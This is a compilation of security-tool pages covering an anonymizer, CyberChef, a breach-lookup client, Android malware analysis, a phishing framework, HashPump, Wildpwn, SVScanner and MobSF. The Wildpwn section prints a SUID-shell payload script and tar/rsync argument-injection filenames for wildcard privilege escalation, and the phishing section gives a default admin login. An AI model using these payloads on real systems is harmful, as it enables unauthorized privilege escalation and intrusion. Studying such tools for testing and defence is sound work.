4nonimizer – A Bash Script For Anonymizing The Public IP Used To Browsing Internet

4nonimizer is a bash script for anonymizing the public IP used to browsing Internet, managing the connection to TOR network and to different VPNs providers (OpenVPN), whether free or paid. By default, it includes several pre-configured VPN connections to different peers (.ovpn files) and download the credentials (if the corresponding provider support it). Also, it records each used IP that we use every 300 seconds in log files.

This script is enabled as a service in systemd systems and uses a default vpn (VPNBook) at system startup.

Since version 1.06 the dns resolution requests are done throught DnsCrypt (enable and disable with option enable_dns or disable_dns)

Since version 1.12 the logs of connections vpn saved in sqlite in /logs/

Also ReadPhishing Frenzy – Ruby on Rails Phishing Framework

4nonimizer Installation

Download the repo using git, execute the command ./4nonimizer install in the directory, and follow the screen instructions, 4nonimizer will move to the directory /opt/ and installed as a service.

This script has full compatibility with Kali Linux, although it has been properly tested and should also work on other distributions like Debian, Ubuntu and Arch (Manjaro). However there could be some bugs, or unexpected performances (please comments if you find any!).

Options

Once installed 4nonymizer, enter the command 4nonimizer help to get the help, which shows all the available parameters:

       ___                   _           _
      /   |                 (_)         (_)
     / /| |_ __   ___  _ __  _ _ __ ___  _ _______ _ __
    / /_| | '_ \ / _ \| '_ \| | '_  ` _ | |_  / _ \ '__|
    \___  | | | | (_) | | | | | | | | | | |/ /  __/ |
        |_/_| |_|\___/|_| |_|_|_| |_| |_|_/___\___|_|
                                       By Carlos Antonini & Vicente Motos
                                       Version: 1.06-beta

Usage: 4nonymizer <parameter>
install: Install the script in run services
uninstall: Disable run service and remove app directory
change_provider: Change VPN Provider
change_ip: Change IP from VPN current
vpn_status: Check IP and provider VPN running
update_vpns: Update all ovpn of VPNs
start: Init the 4nonimizer service
stop: Stop the 4nonimizer service
stop_nonet: Stop the 4nonimizer service and shutdown network interfaces
restart: Restart the 4nonimizer service
update_app: Update this program via git
privoxy: Install and configure privoxy with port 8118 (BETA)
proxychains4: Install and configure proxychains4 for default in the system
browser: Fire up a firefox browser with profile privoxy -> tor
test_availability: Check peers availability and delete ovpn file if the IP/service is unreachable
location: Now you can select a specific country or continent of the vpn peer
enableboot: You can enable service in boot
disableboot: You can disable service in boot
enable_dnscrypt: Enable dnscrypt service
disable_dnscrypt: Disable dnscrypt service

help: Help (this screen)

Available VPNs

Currently it supports the following VPN providers:

Install A New VPN

To install an additional vpn we have to use the following structure in order to the 4nonimizer be able to integrate and perform operations with it.

First, we have to create the following dir structure /vpn/ within 4nonimizer path:

In our example we create the folder /vpntest/ and within it placed all .ovpn files we have. If the files ovpn not have the certificate within each of them we put in the same folder as shown in the example certificate.crt.

In addition, we must place a file named pass.txt containing 2 lines: the first one with the username and the second one with the password, as shown below:

If we have correctly performed all steps when we execute the command 4nonimizer change_provider the menu will show our vpn:

As you can see in the picture, option [7] it is the vpn we’ve created.

Getting Credencials & ovpn Files Automatically

If the VPN provider allows automation of credential and/or .ovpn files getting, 4nonimizer has standardized the following scripts names and locations:

– /opt/4nonimizer/vpn/provider/vpn-get-pass.sh

– /opt/4nonimizer/vpn/provider/vpn-get-ovpn.sh

4nonimizer automatically detect the presence of both scripts and indicate (Auto-pass Login) or (Auto-get OVPN) if it finds in the first line of each file the expression ‘#4uto’ or ‘#m4nual’ depending on the performed actions.

Additional

– Execute ‘source 4nonimizer’ to activate autocompletation of parameters.
– Copy .conkyrc in your home directory to load a 4nonimizer template and execute conky.

CyberChef – A web App For Encryption, Encoding, Compression & Data Analysis

CyberChef is a simple, intuitive web app for carrying out all manner of “cyber” operations within a web browser. These operations include simple encoding like XOR or Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.

The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years.

Also ReadWildpwn – Tool Used For Unix Wildcard Attacks

How it works

There are four main areas in CyberChef:

  1. The input box in the top right, where you can paste, type or drag the text or file you want to operate on.
  2. The output box in the bottom right, where the outcome of your processing will be displayed.
  3. The operations list on the far left, where you can find all the operations that CyberChef is capable of in categorised lists, or by searching.
  4. The recipe area in the middle, where you can drag the operations that you want to use and specify arguments and options.

CyberChef Features

  • Drag and drop
    • Operations can be dragged in and out of the recipe list, or reorganised.
    • Files up to 500MB can be dragged over the input box to load them directly into the browser.
  • Auto Bake
    • Whenever you modify the input or the recipe, CyberChef will automatically “bake” for you and produce the output immediately.
    • This can be turned off and operated manually if it is affecting performance (if the input is very large, for instance).
  • Automated encoding detection
    • CyberChef uses a number of techniques to attempt to automatically detect which encodings your data is under. If it finds a suitable operation which can make sense of your data, it displays the ‘magic’ icon in the Output field which you can click to decode your data.
  • Breakpoints
    • You can set breakpoints on any operation in your recipe to pause execution before running it.
    • You can also step through the recipe one operation at a time to see what the data looks like at each stage.
  • Save and load recipes
    • If you come up with an awesome recipe that you know you’ll want to use again, just click “Save recipe” and add it to your local storage. It’ll be waiting for you next time you visit CyberChef.
    • You can also copy the URL, which includes your recipe and input, to easily share it with others.
  • Search
    • If you know the name of the operation you want or a word associated with it, start typing it into the search field and any matching operations will immediately be shown.
  • Highlighting
    • When you highlight text in the input or output, the offset and length values will be displayed and, if possible, the corresponding data will be highlighted in the output or input respectively.
  • Save to file and load from file
    • You can save the output to a file at any time or load a file by dragging and dropping it into the input field. Files up to around 500MB are supported (depending on your browser), however some operations may take a very long time to run over this much data.
  • CyberChef is entirely client-side
    • It should be noted that none of your recipe configuration or input (either text or files) is ever sent to the CyberChef web server – all processing is carried out within your browser, on your own computer.
    • Due to this feature, CyberChef can be compiled into a single HTML file. You can download this file and drop it into a virtual machine, share it with other people, or use it independently on your local machine.

Browser support

CyberChef is built to support

  • Google Chrome 40+
  • Mozilla Firefox 35+
  • Microsoft Edge 14+

Live demo

CyberChef is still under active development. As a result, it shouldn’t be considered a finished product. There is still testing and bug fixing to do, new features to be added and additional documentation to write. Please contribute!

Cryptographic operations in CyberChef should not be relied upon to provide security in any situation. No guarantee is offered for their correctness.

A live demo can be found here – have fun!

Pwned – A Command-Line Tool For Querying The ‘Have I been Pwned?’ Service

A command-line tool for querying Troy Hunt’s Have I been pwned ? service using the hibp Node.js module.

Pwned Installation

Download and install Node.js, then install pwned globally using npm:

npm install pwned -g

Alternatively, you can run it on-demand using the npx package runner:

npx pwned

How To Ue ?

pwned <command>

Commands:
  pwned ba <account|email>      get all breaches for an account (username or email address)
  pwned breach <name>           get a single breached site by breach name
  pwned breaches                get all breaches in the system
  pwned dc                      get all data classes in the system
  pwned pa <email>              get all pastes for an account (email address)
  pwned pw <password>           securely check a password for public exposure
  pwned search <account|email>  search breaches and pastes for an account (username or email
                                address)

Options:
  -h, --help     Show help                                                                 [boolean]
  -v, --version  Show version number                                                       [boolean]

Also ReadHashPump – Tool To Exploit Hash Length Extension Attack In Various Hashing Algorithms

Examples

Get all breaches for an account:

$ pwned ba pleasebeclean@fingerscrossed.tld
✔ Good news — no pwnage found!

Get all breaches in the system, filtering results to just the ‘adobe.com’ domain:

$ pwned breaches -d adobe.com
-
  Title:        Adobe
  Name:         Adobe
  Domain:       adobe.com
  BreachDate:   2013-10-04
  AddedDate:    2013-12-04T00:00:00Z
  ModifiedDate: 2013-12-04T00:00:00Z
  PwnCount:     152445165
  Description:  In October 2013, 153 million Adobe accounts were breached with each containing an internal ID, username, email, <em>encrypted</em> password and a password hint in plain text. The password cryptography was poorly done and <a href="http://stricture-group.com/files/adobe-top100.txt" target="_blank" rel="noopener">many were quickly resolved back to plain text</a>. The unencrypted hints also <a href="http://www.troyhunt.com/2013/11/adobe-credentials-and-serious.html" target="_blank" rel="noopener">disclosed much about the passwords</a> adding further to the risk that hundreds of millions of Adobe customers already faced.
  DataClasses:
    - Email addresses
    - Password hints
    - Passwords
    - Usernames
  IsVerified:   true
  IsFabricated: false
  IsSensitive:  false
  IsActive:     true
  IsRetired:    false
  IsSpamList:   false
  LogoType:     svg

Get a single breached site by breach name:

$ pwned breach MyCompany
✔ No breach found by that name.

Get all the data classes in the system, returning raw JSON results for external/chained consumption:

$ pwned dc --raw
["Account balances","Address book contacts","Age groups","Ages","Apps installed on devices","Astrological signs","Auth tokens","Avatars","Bank account numbers","Banking PINs","Beauty ratings","Biometric data","Browser user agent details","Buying preferences","Car ownership statuses","Career levels","Cellular network names","Charitable donations","Chat logs","Credit card CVV","Credit cards","Credit status information","Customer feedback","Customer interactions","Dates of birth","Deceased date","Deceased statuses","Device information","Device usage tracking data","Drinking habits","Drug habits","Eating habits","Education levels","Email addresses","Email messages","Employers","Ethnicities","Family members' names","Family plans","Family structure","Financial investments","Financial transactions","Fitness levels","Genders","Geographic locations","Government issued IDs","Health insurance information","Historical passwords","Home ownership statuses","Homepage URLs","IMEI numbers","IMSI numbers","Income levels","Instant messenger identities","IP addresses","Job titles","MAC addresses","Marital statuses","Names","Nationalities","Net worths","Nicknames","Occupations","Parenting plans","Partial credit card data","Passport numbers","Password hints","Passwords","Payment histories","Payment methods","Personal descriptions","Personal health data","Personal interests","Phone numbers","Physical addresses","Physical attributes","Political donations","Political views","Private messages","Professional skills","Profile photos","Purchases","Purchasing habits","Races","Recovery email addresses","Relationship statuses","Religions","Reward program balances","Salutations","School grades (class levels)","Security questions and answers","Sexual fetishes","Sexual orientations","Smoking habits","SMS messages","Social connections","Social media profiles","Spoken languages","Support tickets","Survey results","Time zones","Travel habits","User statuses","User website URLs","Usernames","Utility bills","Vehicle details","Website activity","Work habits","Years of birth","Years of professional experience"]

Get all pastes for an email address:

$ pwned pa nobody@nowhere.com
-
  Source:     Pastebin
  Id:         YrpQA60S
  Title:      null
  Date:       2018-01-24T07:54:15Z
  EmailCount: 16476
-
  Source:     Pastebin
  Id:         suPshHZ1
  Title:      null
  Date:       2017-09-06T03:41:33Z
  EmailCount: 20444
-
  Source:     Pastebin
  Id:         xyb8vavK
  Title:      null
  Date:       2015-06-01T00:16:46Z
  EmailCount: 8
-
  Source:     Pastebin
  Id:         DaaFj8Be
  Title:      CrackingCore - Redder04
  Date:       2015-04-05T22:22:39Z
  EmailCount: 116
-
  Source:     Pastebin
  Id:         9MAAgecd
  Title:      IPTV Yabancı Combolist
  Date:       2015-02-07T15:21:00Z
  EmailCount: 244
-
  Source:     Pastebin
  Id:         QMx1dPUT
  Title:      null
  Date:       2015-02-02T20:45:00Z
  EmailCount: 6607
-
  Source:     Pastebin
  Id:         zUFSee4n
  Title:      nethingoez
  Date:       2015-01-21T15:13:00Z
  EmailCount: 312
-
  Source:     AdHocUrl
  Id:         http://siph0n.in/exploits.php?id=4560
  Title:      BuzzMachines.com 40k+
  Date:       null
  EmailCount: 36959
-
  Source:     AdHocUrl
  Id:         http://siph0n.in/exploits.php?id=4737
  Title:      PayPalSucks Database 102k
  Date:       null
  EmailCount: 82071
-
  Source:     AdHocUrl
  Id:         http://balockae.online/files/BlackMarketReloaded_users.sql
  Title:      balockae.online
  Date:       null
  EmailCount: 10547

Securely check a password to see if it has been exposed in a data breach:

$ pwned pw Password1234
⚠ Oh no — pwned 3360 times!

Search both breaches and pastes for an account (truncating breach data):

$ pwned search nobody -t
breaches:
  -
    Name: BattlefieldHeroes
  -
    Name: CannabisForum
  -
    Name: Forbes
  -
    Name: Gawker
  -
    Name: HackForums
  -
    Name: LoungeBoard
  -
    Name: PokemonCreed
  -
    Name: Win7Vista
pastes:   null

Droidefense – Advance Android Malware Analysis Framework

Droidefense (originally named atom: analysis through observation machine)* is the codename for android apps/malware analysis/reversing tool. It was built focused on security issues and tricks that malware researcher have on they every day work. For those situations on where the malware has anti-analysis routines, Droidefense attemps to bypass them in order to get to the code and ‘bad boy’ routine. Sometimes those techniques can be virtual machine detection, emulator detection, self certificate checking, pipes detection. tracer pid check, and so on.

Droidefense uses an innovative idea in where the code is not decompiled rather than viewed. This allow us to get the global view of the execution workflow of the code with a 100% accuracy on gathered information. With this situation, Droidefense generates a fancy html report with the results for an easy understanding.

Also ReadMobSF – Mobile Security Framework Is An Automated All-In-One Mobile Application

Droidefense Features

  • .apk unpacker
  • .apk resource decoder
  • .apk file enumeration
  • .apk file classification and identification
  • binary xml decoder
  • in-memory processing using a virtual filesystem
  • resource fuzzing and hashing
  • entropy calculator
  • native code dump
  • certificate analysis
  • debug certificate detection
  • opcode analysis
  • unused opcode detection
  • androidManifest.xml analysis
  • internal structure analysis
  • dalvik bytecode flow analysis
  • multipath analysis implementation (not tested)
  • CFG generation
  • simple reflection resolver
  • String classification
  • simulated workflow generation
  • dynamic rules engine

Droidefense modules

  • PSCout data module
  • Full Android manifest parser, based on official SDK documentation v23.
  • Plugins
  • Machine Learning (Weka based) module

Droidefense plugins

  • Hidden ELF file detector plugin
  • Hidden APK file detector plugin
  • Application UID detector plugin
  • Privacy plugin

Usage

java -jar droidefense-cli-1.0-SNAPSHOT.jar -i /path/to/your/sample.apk

Detailed usage

java -jar droidefense-cli-1.0-SNAPSHOT.jar

________               .__    .___      _____                            
\______ \_______  ____ |__| __| _/_____/ ____\____   ____   ______ ____  
 |    |  \_  __ \/  _ \|  |/ __ |/ __ \   __\/ __ \ /    \ /  ___// __ \ 
 |    `   \  | \(  <_> )  / /_/ \  ___/|  | \  ___/|   |  \\___ \\  ___/ 
/_______  /__|   \____/|__\____ |\___  >__|  \___  >___|  /____  >\___  >
        \/                     \/    \/          \/     \/     \/     \/ 

* Current build: 			2018_03_09__09_17_34
* Check out on Github: 			https://github.com/droidefense/
* Report your issue: 			https://github.com/droidefense/engine/issues
* Lead developer: 			@zerjioang

usage: droidefense
 -d,--debug                 print debugging information
 -h,--help                  print this message
 -i,--input <apk>           input .apk to be analyzed
 -o,--output <format>       select prefered output:
                            json
                            json.min
                            html
 -p,--profile               Wait for JVM profiler
 -s,--show                  show generated report after scan
 -u,--unpacker <unpacker>   select prefered unpacker:
                            zip
                            memapktool
 -v,--verbose               be verbose
 -V,--version               show current version information

License

All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

  • Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
  • Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
  • Uses GPL license described below

Phishing Frenzy – Ruby on Rails Phishing Framework

Phishing Frenzy is an Open Source Ruby on Rails application that is leveraged by penetration testers to manage email phishing campaigns.

The goal of the project is to streamline the phishing process while still providing clients the best realistic phishing campaign possible.

Also ReadCangibrina – A Fast & Powerfull Dashboard (admin) Finder

Installing Phishing Frenzy on Kali Linux

Clone Repo

Clone the Phishing Frenzy repository using git

# git clone https://github.com/pentestgeek/phishing-frenzy.git /var/www/phishing-frenzy

Install RVM, Ruby and Packages

$ \curl -sSL https://get.rvm.io | bash

At the end of the installation listen to any post install instructions for RVM

Install Ruby 2.1 with RVM

$ rvm install 2.1.5

Install rails

# rvm all do gem install --no-rdoc --no-ri rails

Install mod_passenger for Apache

# rvm all do gem install --no-rdoc --no-ri passenger

Install Passenger

Invoke the passenger installation script

# passenger-install-apache2-module

Installer stated that I was missing a few apache dependencies

# apt-get install apache2-threaded-dev libapr1-dev libaprutil1-dev libcurl4-openssl-dev

Invoke passenger installation script again now that dependencies are installed. Once the Passenger install has completed, ensure you pay attention to the notes and the end. You will need to add 3 lines of text to your /etc/apache2/apache.conf file.

# passenger-install-apache2-module

Install packages we need for MySQL to bundle properly

# apt-get install libmysqlclient-dev

Apache VHOST Configuration

Add Include Statement to apache2.conf and create the file /etc/apache2/pf.conf

Include pf.conf

Add content to pf.conf file

<IfModule mod_passenger.c>
PassengerRoot %ROOT
PassengerRuby %RUBY
</IfModule>

<VirtualHost *:80>
ServerName phishing-frenzy.com
# !!! Be sure to point DocumentRoot to 'public'!
DocumentRoot /var/www/phishing-frenzy/public
RailsEnv development
<Directory /var/www/phishing-frenzy/public>
# This relaxes Apache security settings.
AllowOverride all
# MultiViews must be turned off.
Options -MultiViews
</Directory>
</VirtualHost>

Uncomment out the line # NameVirtualHost *:443 inside of /etc/apache2/ports.conf to allow SSL Phishing sites to render properly

MySQL

Ensure mysql is running

# service mysql start

Login and create tables and permissions for phishing frenzy development mode

# mysql -u root -p
mysql> create database pf_dev;
mysql> grant all privileges on pf_dev.* to 'pf_dev'@'localhost' identified by 'password';

Install Required Gems

# cd /var/www/phishing-frenzy/

# bundle install

If your web application fails to run because it states your missing a gem, you may need to run

# bundle install --deployment

# rake db:migrate

# rake db:seed

Install Redis

# wget http://download.redis.io/releases/redis-stable.tar.gz

# tar xzf redis-stable.tar.gz

# cd redis-x.x.x/

# make

# make install

# cd utils/

# ./install_server.sh

If you would like to bind redis to the loopback interface checkout redis documentation for more details

Sidekiq Configuration

Create a tmp directory for sidekiq pid

# mkdir -p /var/www/phishing-frenzy/tmp/pids

Start the sidekiq server to interact with redis

# bundle exec sidekiq -C config/sidekiq.yml

System Configuration

Edit the sudoers file to ensure the www-data account can reload apache

www-data ALL=(ALL) NOPASSWD: /etc/init.d/apache2 reload

Load the Efax and Intel default templates for PF using the rake helper

# rake templates:load

Change ownership of phishing-frenzy directory so apache has proper access

# chown -R www-data:www-data /var/www/phishing-frenzy/

Change permissions on the upload directory

# chmod -R 755 /var/www/phishing-frenzy/public/uploads/

Change ownership of sites-enabled directory to allow Phishing Frenzy to manage virtual hosts with Apache

# chown -R www-data:www-data /etc/apache2/sites-enabled/
# chmod -R 755 /etc/apache2/sites-enabled/

Start Apache web server

# apachectl start

Phishing Frenzy is configured with a default login of:

username: admin
password: Funt1me!

Configure HTTPS / SSL

If you would like to run your Phishing Frenzy web UI over HTTPS you can do that with a few additional changes.

Run a few commands to enable the SSL module in apache and create a directory to store the cert and key.

$ sudo a2enmod ssl

$ sudo service apache2 restart

$ sudo mkdir /etc/apache2/ssl

Create our self signed cert using openssl

$ sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/apache2/ssl/pf.key -out /etc/apache2/ssl/pf.crt

<IfModule mod_passenger.c>
PassengerRoot %ROOT
PassengerRuby %RUBY
</IfModule>

<VirtualHost *:443>
ServerName phishing-frenzy.com

SSLEngine on
SSLCertificateFile /etc/apache2/ssl/pf.crt
SSLCertificateKeyFile /etc/apache2/ssl/pf.key

# !!! Be sure to point DocumentRoot to 'public'!
DocumentRoot /var/www/phishing-frenzy/public
RailsEnv development
<Directory /var/www/phishing-frenzy/public>
# This relaxes Apache security settings.
AllowOverride all
# MultiViews must be turned off.
Options -MultiViews
</Directory>
</VirtualHost>

Update the Application Site URL within Global Settings menu to the appropriate FQDN with the HTTPS address with SSL enabled.

Credit: Brandon zeknox McCann

HashPump – Tool To Exploit Hash Length Extension Attack In Various Hashing Algorithms

HashPump is a tool to exploit the hash length extension attack in various hashing algorithms. Currently supported algorithms: MD5, SHA1, SHA256, SHA512.

Menu

$ hashpump -h
HashPump [-h help] [-t test] [-s signature] [-d data] [-a additional] [-k keylength]
    HashPump generates strings to exploit signatures vulnerable to the Hash Length Extension Attack.
    -h --help          Display this message.
    -t --test          Run tests to verify each algorithm is operating properly.
    -s --signature     The signature from known message.
    -d --data          The data from the known message.
    -a --additional    The information you would like to add to the known message.
    -k --keylength     The length in bytes of the key being used to sign the original message with.
    Version 1.2.0 with CRC32, MD5, SHA1, SHA256 and SHA512 support.
    <Developed by bwall(@botnet_hunter)>

Also ReadMobSF – Mobile Security Framework Is An Automated All-In-One Mobile Application

Sample Output

$ hashpump -s '6d5f807e23db210bc254a28be2d6759a0f5f5d99' --data 'count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo' -a '&waffle=liege' -k 14
0e41270260895979317fff3898ab85668953aaa2
count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

HashPump Installation

$ git clone https://github.com/bwall/HashPump.git
$ apt-get install g++ libssl-dev
$ cd HashPump
$ make
$ make install

apt-get and make install require root privileges to run correctly. The actual requirement is for -lcrypto, so depending on your operating system, your dependencies may vary.

On OS X HashPump can also be installed using Homebrew:

$ brew install hashpump

Python Bindings

Fellow Python lovers will be pleased with this addition. Saving me from writing an implementation of all these hash algorithms with the ability to modify states in Python, Python bindings have been added in the form of hashpumpy.

Installation

These Python bindings are available on PyPI and can be installed via pip. pip install hashpumpy

Usage

>>> import hashpumpy
>>> help(hashpumpy.hashpump)
Help on built-in function hashpump in module hashpumpy:

hashpump(...)
    hashpump(hexdigest, original_data, data_to_add, key_length) -> (digest, message)

    Arguments:
        hexdigest(str):      Hex-encoded result of hashing key + original_data.
        original_data(str):  Known data used to get the hash result hexdigest.
        data_to_add(str):    Data to append
        key_length(int):     Length of unknown data prepended to the hash

    Returns:
        A tuple containing the new hex digest and the new message.
>>> hashpumpy.hashpump('ffffffff', 'original_data', 'data_to_add', len('KEYKEYKEY'))
('e3c4a05f', 'original_datadata_to_add')

Python 3 note

hashpumpy supports Python 3. Different from the Python 2 version, the second value (the new message) in the returned tuple from hashpumpy.hashpump is a bytes-like object instead of a string.

Wildpwn – Tool Used For Unix Wildcard Attacks

Wildpwn is a Python UNIX wildcard attack tool that helps you generate attacks. It’s considered a fairly old-skool attack vector, but it still works quite often.

Wildpwn Usage

It goes something like this:

usage: wildpwn.py [-h] [--file FILE] payload folder

Tool to generate unix wildcard attacks

positional arguments:
  payload      Payload to use: (combined | tar | rsync)
  folder       Where to write the payloads

optional arguments:
  -h, --help   show this help message and exit
  --file FILE  Path to file for taking ownership / change permissions. Use it
               with combined attack only.

Payload types

  • combined: Uses the chown & chmod file reference tricks, described in section 4.1 and 4.2, combined in a single payload.
  • tar: Uses the Tar arbitrary command execution trick, described in section 4.3.
  • rsync: Uses the Rsync arbitrary command execution trick, described in section 4.4.

Also ReadSVScanner – Scanner Vulnerability And MaSsive Exploit

Example

$ ls -lh /tmp/very_secret_file
-rw-r--r-- 1 root root 2048 jun 28 21:37 /tmp/very_secret_file

$ ls -lh ./pwn_me/
drwxrwxrwx 2 root root 4,0K jun 28 21:38 .
[...]
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_1
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_2
[...]

$ python wildpwn.py --file /tmp/very_secret_file combined ./pwn_me/
[!] Selected payload: combined
[+] Done! Now wait for something like: chown uid:gid *  (or)  chmod [perms] * on ./pwn_me/. Good luck!

[...time passes / some cron gets executed...]

# chmod 000 * (for example)

[...back with the unprivileged user...]

$ ls -lha ./pwn_me/
[...]
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_1
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_2
[...]

$ ls -lha /tmp/very_secret_file
-rwxrwxrwx 1 root root 2048 jun 28 21:38 /tmp/very_secret_file

Bash Scripts Used On tar/rsync Attacks

#!/bin/sh

# get current user uid / gid
CURR_UID="$(id -u)"
CURR_GID="$(id -g)"

# save file
cat > .cachefile.c << EOF
#include <stdio.h>
int main()
{
setuid($CURR_UID);
setgid($CURR_GID);
execl("/bin/bash", "-bash", NULL);
return 0;
}
EOF

# make folder where the payload will be saved
mkdir .cache
chmod 755 .cache

# compile & give SUID
gcc -w .cachefile.c -o .cache/.cachefile
chmod 4755 .cache/.cachefile

Clean up (tar)

# clean up
rm -rf ./'--checkpoint=1'
rm -rf ./'--checkpoint-action=exec=sh .webscript'
rm -rf .webscript
rm -rf .cachefile.c

Clean up (rsync)

# clean up
rm -rf ./'-e sh .syncscript'
rm -rf .syncscript
rm -rf .cachefile.c

Credit: Leon Juranic

BurpSuite Extension Ruby : Template to speed up building a Burp Extension using Ruby

Due the lake of examples and implementations of BurpSuite Extension Ruby, we have decided to make it easy for all rubyists to have a confident and quick start to build useful extension for InfoSec community.

This repository is a collection of templates of Burp Suite Extensions, focusing on Burp suite API functionalities and simplifying Java language consuming through JRuby.

Here, we’re trying to make it a simple as possible. You Just focus on your idea and save time tons of times searching for examples and extensions.

There are couple of news here, one is good and one is bad:

The good news is, all written extensions whether its written in Java, Ruby or Python are identecally useful resources to you.

The Bad news is, you’ve to read and understand a bit of Java. And that’s the key of the good news though 😉

Note: Some extensions have been supported with animated screenshots for clarity before use.

Also ReadMalwareCMDMonitor – Shows Command Lines Used By Latest Instances Analyzed On Hybrid-Analysis

BurpSuite Extension Ruby

Burp GUI

Extension Description
send_alert_pure.rb Pure implementation of sending messages to Alerts tab
popup_msg_pure.rb Pure implementation of popping up a GUI message box
suite_itab_pure.rb Pure implementation of Suite Tab (ITab)
editor_tab_pure.rb Pure implementation of editor tab (beside request & response tabs)
context_menu_pure.rb Pure implementation of context menu (Right-click menu)
suite_itab_subtab.rb Pure implementation of Suite Tab and sub-tabs (sub-panels)
suite_itab_subtab_icon.rb Pure implementation of Suite Tab and sub-tabs (sub-panels) with icons
context_menu_pure.rb Pure implementation of custom menus and sub-menus with some actions
tab_tree.rb Implementation of tab contains a tree of items

Resources

  • Customizing Burp Suite – Getting the Most out of Burp Extensions [ Link ]
  • Google dork: burp extension site:github.com

SVScanner – Scanner Vulnerability And MaSsive Exploit

SVScanner is a tool for scanning and massive exploits. Our tools target several open source cms.

Requirements

  • PHP 7 (version and up)
  • Install Modules PHP : php-cli & php-curl for linux

Also ReadHershell – Simple TCP Reverse Shell Which Can Work On Multiple Systems

SVScanner Installation

Linux

git clone https://github.com/radenvodka/SVScanner.git
cd SVScanner
php svscanner.php

Windows

Download Xampp (PHP7)
Download SVScanner : https://github.com/radenvodka/SVScanner/releases
and open with cmd php svscanner.php

Disclamier

Modifications, changes, or changes to this code can be accepted, however, every public release that uses this code must be approved by writing this tool.

Credit: Eka Syahwan

MobSF – Mobile Security Framework Is An Automated All-In-One Mobile Application

Mobile Security Framework or MobSF is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing framework capable of performing static, dynamic and malware analysis. It can be used for effective and fast security analysis of Android, iOS and Windows mobile applications and support both binaries (APK, IPA & APPX ) and zipped source code. It can do dynamic application testing at runtime for Android apps and has Web API fuzzing capabilities powered by CapFuzz.

Static Analyzer Docker Image

Automated prebuilt docker image of MobSF Static Analyzer is available from DockerHub

docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest

Also ReadHeadless Burp – Automate security tests using Burp Suite

Requirements

Static Analysis

  • Python 3.6+
  • Oracle JDK 1.7 or above
  • Mac OS Users must install Command-line tools
  • iOS IPA Analysis works only on Mac and Linux.
  • Windows App Static analysis requires a Windows Host or Windows VM for Mac and Linux.

NOTE:

  • On Linux and Mac, install Oracle Java 1.7 or above and make it the default one.
  • On Linux, make sure you have 32 bit execution support enabled.

Dynamic Analysis

  • If you are going to use MobSF x86 Android VM, it requires Oracle VirtualBox – VirtualBox Download.
  • If you are going to use MobSF Android AVD (ARM Emulator), It requires Android Studio and a configured AVD.
  • Hardware Requirements: Min 4GB RAM, 5GB HDD/SSD and Virtualization Support for running MobSF VM and Intel HAXM if you are running MobSF ARM Emulator.

Installation

Tested on Windows (7, 8, 8.1, 10), Kali (2016.2), Ubuntu (14.04, 16.04) , OSX (Mavericks, Yosemite, El Capitan), OS (Sierra, High Sierra)

Configuring Static Analyzer

git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
cd Mobile-Security-Framework-MobSF
pip3 install virtualenv
virtualenv -p python3 venv
source venv/bin/activate
pip3 install -r requirements.txt

PDF Report Generation

  • You need to install wkhtmltopdf binary separately for generating PDF reports.
  • Check wkhtmltopdf downloads and Installing wkhtmltopdf wiki for more information.
  • In Windows, you need to add the folder that contains wkhtmltopdf binary to environment variable PATH.

Running

python3 manage.py runserver

If you need to run on a specific port number try python3 manage.py runserver PORT_NO. To expose MobSF to a particular IP, you can try python3 manage.py runserver IP:PORT_NO.

If everything goes right, you will get an output like the one below.

You can navigate to http://localhost:8000/ to access the MobSF Web interface.

Configuring Dynamic Analyzer with MobSF Android 4.4.2 x86 VirtualBox VM

Dynamic Anlayzer is available only for Android binaries (APK) and works only if your computer has at least 4GB of RAM and Full Virtualization support.

NOTE: If you are configuring MobSF VM in VirtualBox for Dynamic Analysis, you must have configured MobSF in the host OS and not inside any VM.

To Configure Dynamic Analyzer we need 4 things.

  • VM UUID
  • Snapshot UUID
  • Host/Proxy IP
  • VM/Device IP

Steps to Follow

  • Open VirtualBox, Go to File -> Import Appliance and select the MobSF_VM_X.X.ova file.

  • Proceed with the import process. Do not alter anything.
  • Once the OVA is Imported Successfully, you will see a new entry in VirtualBox named MobSF_VM_X.X
  • Right Click MobSF VM and Choose Settings, Go to Network tab. Here we need to configure two Network Adapters.
    • Adapter 1 should be enabled and attached to Host-only Adapter. Remember the name of the adapter. We need the name to Identify the Host/Proxy IP.

    • Adapter 2 should be enabled and attached to NAT

  • Save the settings and Start MobSF VM. While the VM is Booting up. Note down the VM IP.

  • Once the VM Boots up, It will present a Lock Screen. The password for the Lock Screen is 1234.

NOTE: If the VM does not boot up properly then you cannot perform Dynamic Analysis with MobSF VM.

  • Getting the Host/Proxy IP
    • Windows : Issue the command ipconfig in command prompt and note down the IP corresponding to the name of the Host-only Adapter.

    • Unix : Issue the command ifconfig in terminal and note down the IP corresponding to the name of the Host-only Adapter.

NOTE: The VirtualBox Host-Only Adapter IP and MobSF VM IP should be in the same network range. If your MobSF VM IP and Adapter IP are in different network range, modify the Adapter IP to be in the same network range as that of MobSF VM IP.

  • Go to Wi-Fi Settings in MobSF VM and set the Proxy IP as the Host/Proxy IP which you have obtained from the previous step and port no as 1337.

  • Save the settings and Navigate to the Home Screen of MobSF VM. Wait for 30 seconds and save a snapshot of the MobSF VM in VirtualBox

  • Once the Snapshot is saved, right click MobSF VM and select Show in Explorer or Show in Finder.

